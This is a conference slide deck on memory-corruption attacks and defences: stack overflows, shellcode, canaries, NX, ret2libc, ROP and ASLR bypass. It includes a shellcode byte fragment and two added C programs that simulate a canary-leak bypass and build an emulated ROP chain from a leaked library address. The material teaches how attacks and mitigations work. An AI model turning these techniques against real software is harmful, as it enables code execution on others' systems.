
Memory Attack - The Memory Attack Techniques


Published on 2019.05.26 - Ubuntu Fest, Daejeon

Published in: Software

  1. The Rise and Fall of The Memory Attack Techniques - 05.26 Ubuntu Fest - Kim Seong Min
  2. Speaker Info - Name: Kim Seong Min (김성민) - Occupation: university student - Class of '16 (young!) - Specialty: president of ARGOS - Hobby: hacking (cool!)
  3. Research Areas - System / Network Security - Reverse Engineering - Mobile Application - macOS / iOS Kernel Security - TMI: favorites: drinking alcohol…🤪, playing games; my first “hello, world!”: 3 years ago; wanna be an offensive security researcher :D
  4. Table of Contents - Period 1: What is a memory attack? - Period 2: Let's hit the stack - Period 3: The evolution of spear and shield - Period 4: Q&A
  5. What is a memory attack? - Memory Bugs and Attack - Segmentation Fault - Types of Memory Bugs - Types of Memory Attack
  6. Memory Attack - The crown jewel of system hacking (memory attack ⊂ system hacking) - Attack: trigger a vulnerability (exploit) in order to write whatever I want, wherever I want
  7. Memory Bugs and Attack - Memory bugs (errors) != memory attacks - Every vulnerability is a bug, but not every bug is exploitable (maybe…?) - [2014 CodeEngn Conference 10] 심준보, “급전이 필요합니다” (“I need cash, fast”)
  8. Memory Bugs - Typically arise in unsafe languages (e.g. C, C++, …), which allow low-level memory access, enforce typing only weakly, and leave memory management explicit to the programmer - Sometimes they also cause a segmentation fault
  9. Segmentation Fault - The OS signals the process that it attempted to access memory it is not allowed to (the MMU raises the fault; on Linux the process receives SIGSEGV) - Good news for hackers, or for you: some of the memory errors behind a segfault are exploitable!
  10. Types of Memory Bugs - Dereferencing a pointer that is out of bounds (buffer overflow / over-read)
  11. Types of Memory Bugs - Dereferencing a pointer to freed memory: a dangling pointer, i.e. use-after-free - [pwnable.kr - Toddler’s Bottle] uaf, 8pt
  12. Types of Memory Attack - Code corruption - Control-flow hijack - Data-only attack - Information leak - Taxonomy from “Eternal War in Memory”, published at the IEEE S&P Symposium, 2013
  13. Types of Memory Attack - Control-flow hijack [figure from A. Barresi, “Fighting the War in Memory”, 2014]
  14. Types of Memory Attack - Information leak: e.g. reading out the canary value (security-critical data) - The leaked output has to be interpreted (parsed back into the raw value) before it is useful to the attacker
  15. Let's hit the stack - Memory Layout Overview - Stack Memory - Basic Stack-based Attack - NX Stack and Canaries - Return to Oriented Programming
  16. Memory Layout Overview - Memory layout (keeping it simple!): TEXT | DATA | BSS | HEAP | … | STACK, from low to high addresses - code, global variables, dynamic allocations, function temporaries, etc.
  17. Memory Layout Overview - TEXT (CODE) segment - The program's executable code lives here: the machine instructions
  18. Memory Layout Overview - DATA & BSS segments - Global and static variables - DATA: initialized data - BSS: uninitialized (zero-filled) data
  19. Memory Layout Overview - HEAP segment - Dynamic allocation area (malloc)
  20. Memory Layout Overview - STACK segment - Local variables - Temporary values - The area we look at from now on
  21. Stack Memory - Standard stack frame of a function [diagram, low to high: local buffer 0x41414141, 0x42424242, 0x43434343, 0x00444444, 0x00000000, then SFP, then RET]
  22. Stack Memory - RETurn address (RET): main calls func1, func1 calls func2; each `call` pushes the address of the next instruction, and each `ret` pops it to resume the caller [diagram, low to high: func2 stack frame, func1 stack frame, main stack frame]
  23. Stack Memory - Stack Frame Pointer (SFP): the caller's saved frame pointer [diagram: func's stack frame at 0xFFFFD56C holds the buffer 0x41414141 … 0x00000000, SFP = 0xFFFFD588 (pointing at main's frame), RET; main's stack frame at 0xFFFFD588 holds its own SFP and RET]
  24. Basic Stack-based Attack - Buffer Overflow: overruns the buffer's boundary and overwrites adjacent memory locations - First described in October 1972 (Computer Security Technology Planning Study) [diagram: buffer filled with 0x41414141, SFP = 0x41414141, RET = 0x41414141]
  25. Basic Stack-based Attack - Control-flow hijack with BOF: call an ‘evil’ function - Trigger the bug in the vuln() function so that RET is replaced by the evil function's address [diagram: buffer 0x41414141 ×2, SFP = 0x41414141, RET = 0x08048486]
  26. Basic Stack-based Attack - Control-flow hijack with BOF: execute shellcode - RET = &shellcode, pointing at a copy of the shellcode placed somewhere in memory - Shellcode: the set of instructions that spawns a shell, e.g. the bytes 0x6850c031 0x68732F2F … (xor eax,eax; push eax; push “//sh”; …) [diagram: buffer 0x41414141 ×2, SFP = 0x41414141, RET = &shellcode → 0x41414141 0x6850c031 0x68732F2F …]
  27. Basic Stack-based Attack - Morris Worm (1988) - The first Internet worm to cause widespread disruption - Exploited a buffer overflow (in fingerd)
  28. NX Stack and Canaries - Non-eXecutable Stack (1997) - Prevents executing code in specific areas (e.g. stack, heap) - W^X (on BSD), DEP (on Windows) - Text (code) segment is non-writable; stack (and heap) segments are non-executable - The shellcode can still be written to the stack, but returning into it faults [diagram: buffer 0x41414141 ×3, RET → 0x41414141 0x6850c031 0x68732F2F … crash‼] - On Linux, check a binary's GNU_STACK program header (readelf -l) or the [stack] line of /proc/<pid>/maps for the x flag
  29. NX Stack and Canaries - NX in GDB (stack is not executable) [screenshot]
  30. NX Stack and Canaries - Stack Canary (1998) - Place a specific pattern called a ‘canary’ between the stack variables and the saved frame pointer / return address - Designed to detect stack BOF: the function epilogue compares the canary and aborts if it changed - Cheap and powerful - Bypass: leak the canary value first (information leak), then write it back unchanged during the overflow [diagram: buffer 0x41414141, canary, 0x41414141, 0x41414141, RET → 0x41414141 0x6850c031 0x68732F2F … crash‼]
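The following program is an added example, not code from the slides or from the speaker. It simulates the frame drawn on slides 24-26 and 30 as a plain byte array (buf | canary | SFP | RET, low to high) so that the overflow is reproducible without undefined behaviour, and it plays through three scenarios: a plain return-address overwrite, an overflow that trips the canary check, and the leak-based bypass where the attacker writes the known canary back in place. All addresses and the canary value are constructed; the `p32`/`u32` helpers do the same job as pwntools' `p32()`/`u32()`.

```c
#include <inttypes.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simulated frame, low -> high addresses, mirroring the slide diagrams:
 * buf[16] | canary (only when "compiled" with a stack protector) | SFP | RET */
#define BUF_SIZE   16
#define WORD       4
#define OFF_CANARY (BUF_SIZE)
#define OFF_SFP    (BUF_SIZE + WORD)
#define OFF_RET    (BUF_SIZE + 2 * WORD)
#define FRAME_SIZE (BUF_SIZE + 3 * WORD)

/* Little-endian 32-bit pack/unpack (what pwntools' p32()/u32() do). */
static void p32(uint8_t *dst, uint32_t v) {
    for (int i = 0; i < WORD; i++) dst[i] = (uint8_t)(v >> (8 * i));
}
static uint32_t u32(const uint8_t *src) {
    uint32_t v = 0;
    for (int i = 0; i < WORD; i++) v |= (uint32_t)src[i] << (8 * i);
    return v;
}

typedef struct {
    uint32_t ret;    /* the address `ret` would pop into EIP */
    bool canary_ok;  /* false: the epilogue check fires (__stack_chk_fail) */
} epilogue_t;

/* The vulnerable function: an unbounded copy into a 16-byte buffer (the
 * strcpy/gets pattern). SFP/RET are constructed values. The copy is clamped
 * to the whole frame only so the simulation stays well-defined C; the
 * 16-byte buffer itself has no bounds check. */
static epilogue_t vuln(const uint8_t *input, size_t len, bool protector, uint32_t canary) {
    uint8_t frame[FRAME_SIZE];
    memset(frame, 0, sizeof frame);
    p32(frame + OFF_CANARY, protector ? canary : 0);
    p32(frame + OFF_SFP, 0xFFFFD588u);   /* constructed, as on slide 23 */
    p32(frame + OFF_RET, 0x08048400u);   /* constructed original return address */

    if (len > FRAME_SIZE) len = FRAME_SIZE;
    memcpy(frame, input, len);           /* the overflow: bytes 16.. land on canary/SFP/RET */

    epilogue_t e;
    e.canary_ok = !protector || u32(frame + OFF_CANARY) == canary;
    e.ret = u32(frame + OFF_RET);
    return e;
}

/* Classic payload: 'A' padding, whatever goes into the canary slot, a junk
 * SFP, then the new RET (&evil or &shellcode). Returns the payload length. */
static size_t build_payload(uint8_t *out, uint32_t canary_slot, uint32_t new_ret) {
    memset(out, 'A', BUF_SIZE);          /* 0x41414141 ... */
    p32(out + OFF_CANARY, canary_slot);
    p32(out + OFF_SFP, 0x41414141u);     /* SFP: we don't care what it becomes */
    p32(out + OFF_RET, new_ret);
    return FRAME_SIZE;
}

#define EVIL   0x08048486u   /* the target address shown on slide 25 */
#define CANARY 0x2b7c9a00u   /* constructed; glibc zeroes the low byte so str* copies stop at it */

/* Slide 25: no protector, RET is simply replaced. Returns the hijacked RET. */
static uint32_t scenario_no_canary(void) {
    uint8_t payload[FRAME_SIZE];
    size_t n = build_payload(payload, 0x41414141u, EVIL);
    return vuln(payload, n, false, 0).ret;
}

/* Slide 30: protector on, no leak. The padding clobbers the canary and the
 * epilogue aborts; 0 signals "detected". */
static uint32_t scenario_canary_blind(void) {
    uint8_t payload[FRAME_SIZE];
    size_t n = build_payload(payload, 0x41414141u, EVIL);
    epilogue_t e = vuln(payload, n, true, CANARY);
    return e.canary_ok ? e.ret : 0;
}

/* Slide 30, "bypass using information leak": the canary was read out of the
 * process first, so the payload rewrites it with itself and the check passes. */
static uint32_t scenario_canary_leaked(void) {
    uint8_t payload[FRAME_SIZE];
    size_t n = build_payload(payload, CANARY, EVIL);
    epilogue_t e = vuln(payload, n, true, CANARY);
    return e.canary_ok ? e.ret : 0;
}

int main(void) {
    printf("no canary     : ret = 0x%08" PRIx32 "\n", scenario_no_canary());
    printf("canary, blind : ret = 0x%08" PRIx32 " (0 = caught by the check)\n", scenario_canary_blind());
    printf("canary, leaked: ret = 0x%08" PRIx32 "\n", scenario_canary_leaked());
    return 0;
}
```

The three scenarios are the slide's storyline in miniature: the canary slot sits between the buffer and SFP/RET, so any contiguous overflow that reaches RET must pass through it, and only an attacker who already knows its value can keep the epilogue check quiet.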
  31. Return 2 Oriented Programming - ret2libc (1997) - No code injection needed: return into a function that already exists in libc - Bypasses the NX protection [diagram: buffer 0x41414141 ×2, SFP = 0x41414141, RET = &system → libc's own instructions for system()]
  32. Return 2 Oriented Programming - ret2plt (2001) - Call a dynamic library's function through the binary's PLT entry, so no libc address is needed - Bypasses the NX protection [diagram: buffer 0x41414141 ×2, SFP = 0x41414141, RET = &puts@plt, next word = &system@plt; each PLT stub jumps through the Procedure Linkage Table into the real libc function]
  33. Return 2 Oriented Programming - Krahmer's code snippet reuse (2005) - Reuse small pieces of code instead of entire libc functions - Use “gadgets” or “snippets”: short instruction sequences ending in `ret` - It really feels like programming all over again - “ROP” [diagram: buffer 0x41414141 ×2, SFP = 0x41414141, RET = &gadget1, fake RET = &gadget2; gadget1 = instructions… ret, gadget2 = instructions… ret]
  34. The evolution of spear and shield - ASLR: the end of the memory war? - Bypassing ASLR - And, new mitigations - Endgame
  35. ASLR: the end of the memory war? - Address Space Layout Randomization - PaX team's ASLR (2001) - Randomness in the address space layout of processes - Strategy? Per process, at every exec (Linux); library bases randomized system-wide once per boot (Windows) - PIC & PIE required to randomize the executable image itself
  36. [figure from A. Barresi, “Fighting the War in Memory”, 2014]
  37. Bypassing ASLR - Brute-force attack (low entropy): feasible on 32-bit, but practically impossible on 64-bit - Information leak: find the base address of a specific segment (library, stack, …) and derive every other address from known offsets
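The following program is an added example and not the speaker's code; it ties slide 33 (gadget-based code reuse) to slide 37 (defeating ASLR with one leaked address). It scans a constructed byte string that stands in for a mapped libc text segment for `pop r32; ret` gadgets (x86, 32-bit), derives the randomized library base from a constructed leaked `puts` address plus a constructed symbol offset, lays out a chain that loads two registers and finally returns into `system`, and then emulates what the CPU's `ret` would do with that stack. The `LIB_CODE` bytes, `OFF_PUTS`, `OFF_SYSTEM` and the leaked value are all assumptions made for the demonstration.

```c
#include <inttypes.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* A `pop r32; ret` gadget: its address and the register it loads (0=eax..7=edi). */
typedef struct { uint32_t addr; uint8_t reg; } gadget_t;
static const char *const REG_NAME[8] = {"eax","ecx","edx","ebx","esp","ebp","esi","edi"};

/* Constructed "library" bytes standing in for a libc text segment.
 * Gadgets at offsets 3 (pop ebp; ret), 7 (pop eax; ret) and 10 (pop ebx; ret);
 * the last one is *unintended*: it is the tail of `mov eax, 0x0000c35b`. */
static const uint8_t LIB_CODE[] = {
    0x55, 0x89, 0xe5,               /* push ebp; mov ebp, esp */
    0x5d, 0xc3,                     /* pop ebp; ret */
    0x31, 0xc0,                     /* xor eax, eax */
    0x58, 0xc3,                     /* pop eax; ret */
    0xb8, 0x5b, 0xc3, 0x00, 0x00,   /* mov eax, 0x0000c35b  (contains 5b c3) */
    0xc3,                           /* ret */
};
#define OFF_PUTS   0x5f3a0u   /* constructed symbol offsets inside that library */
#define OFF_SYSTEM 0x3cd10u

/* Scan every byte offset for 0x58..0x5f followed by 0xC3. x86 instructions
 * have no alignment, so landing mid-instruction is legal; that is where the
 * unintended gadgets come from. */
static size_t find_pop_ret(const uint8_t *code, size_t len, uint32_t base,
                           gadget_t *out, size_t max) {
    size_t n = 0;
    for (size_t i = 0; i + 1 < len && n < max; i++) {
        if (code[i] >= 0x58 && code[i] <= 0x5f && code[i + 1] == 0xc3) {
            out[n].addr = base + (uint32_t)i;
            out[n].reg  = (uint8_t)(code[i] - 0x58);
            n++;
        }
    }
    return n;
}

/* Slide 37, information leak: leaked pointer minus its known offset is the
 * randomized base; everything else is base + offset. Libraries are mapped
 * page-aligned, so a misaligned result means the leak or the offsets are
 * wrong (e.g. a different libc build). */
static bool libc_base_from_leak(uint32_t leaked_puts, uint32_t *base) {
    uint32_t b = leaked_puts - OFF_PUTS;
    if (b & 0xfffu) return false;
    *base = b;
    return true;
}

typedef struct { uint32_t reg[8]; uint32_t pc; } cpu_t;

/* Emulate the chain as the CPU would: `ret` pops the next word into EIP; a
 * `pop reg; ret` gadget consumes one more word and `ret`s again. The first
 * popped address that is not a known gadget is the final target. */
static cpu_t run_chain(const uint32_t *chain, size_t n, const gadget_t *g, size_t ng) {
    cpu_t cpu = {{0}, 0};
    size_t sp = 0;
    while (sp < n) {
        cpu.pc = chain[sp++];                          /* ret */
        const gadget_t *hit = NULL;
        for (size_t i = 0; i < ng; i++) if (g[i].addr == cpu.pc) hit = &g[i];
        if (!hit || sp >= n) break;                    /* reached system(), or stack exhausted */
        cpu.reg[hit->reg] = chain[sp++];               /* pop reg */
    }
    return cpu;
}

/* Whole pipeline: leak -> base -> gadgets -> chain -> emulated execution. */
static cpu_t demo_chain(void) {
    gadget_t g[8];
    uint32_t base = 0;
    if (!libc_base_from_leak(0xf7e5f3a0u, &base)) return (cpu_t){{0}, 0};  /* constructed leak */
    size_t ng = find_pop_ret(LIB_CODE, sizeof LIB_CODE, base, g, 8);
    uint32_t pop_eax = 0, pop_ebx = 0;
    for (size_t i = 0; i < ng; i++) {
        if (g[i].reg == 0) pop_eax = g[i].addr;
        if (g[i].reg == 3) pop_ebx = g[i].addr;
    }
    uint32_t chain[] = {            /* stack contents after the overwritten RET, low -> high */
        pop_eax, 0x0000000bu,       /* pop eax; ret   -> eax = 11 */
        pop_ebx, 0x41414141u,       /* pop ebx; ret   -> ebx = placeholder argument pointer */
        base + OFF_SYSTEM,          /* final ret into system() */
    };
    return run_chain(chain, sizeof chain / sizeof chain[0], g, ng);
}

static size_t demo_gadget_count(void) {
    gadget_t g[8];
    return find_pop_ret(LIB_CODE, sizeof LIB_CODE, 0, g, 8);
}

int main(void) {
    gadget_t g[8];
    size_t ng = find_pop_ret(LIB_CODE, sizeof LIB_CODE, 0, g, 8);
    for (size_t i = 0; i < ng; i++)
        printf("offset 0x%02" PRIx32 ": pop %s; ret\n", g[i].addr, REG_NAME[g[i].reg]);
    cpu_t c = demo_chain();
    printf("eax=0x%08" PRIx32 " ebx=0x%08" PRIx32 " -> pc=0x%08" PRIx32 "\n", c.reg[0], c.reg[3], c.pc);
    return 0;
}
```

The page-alignment check in `libc_base_from_leak` is the sanity test a practitioner runs before firing a chain: offsets taken from the wrong libc build produce a plausible-looking but misaligned base, and the chain then returns into garbage.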
  38. And, new mitigations - Enhanced Mitigation Experience Toolkit (EMET) - A security toolkit for MS Windows - Helps enable and configure Windows security features - User-level (non-kernel) protection for individual PCs - Protection against ROP techniques - EMET reached end of life in 2018; its features live on in Windows Defender Exploit Protection
  39. And, new mitigations - Control Flow Guard (CFG) - A mitigation supported from Visual Studio 2015 - Adds a check that the target of an indirect call is a valid function entry - If the CFG check fails, the process is terminated - Blocks calls to malicious function pointers or arbitrary instruction sequences (forward-edge only: return addresses are not checked)
  40. Endgame
  41. Endgame - But hackers never die… - If the stack is out, hit the heap instead? - Or use other bug classes? - Heap spraying, heap feng shui, type confusion, use-after-free, and so on… - There is still plenty left to hit
  42. Endgame - Mitigation is not a “Deus Ex Machina” - Mitigations only assist - Bypass and patch keep repeating - The effort not to create bugs in the first place is what matters
  43. Chatterbox: Kim Seong Min - Period 1: What is a memory attack? - Period 2: Let's hit the stack - Period 3: The evolution of spear and shield - Period 4: Q&A - Q & A - Thank you for listening!
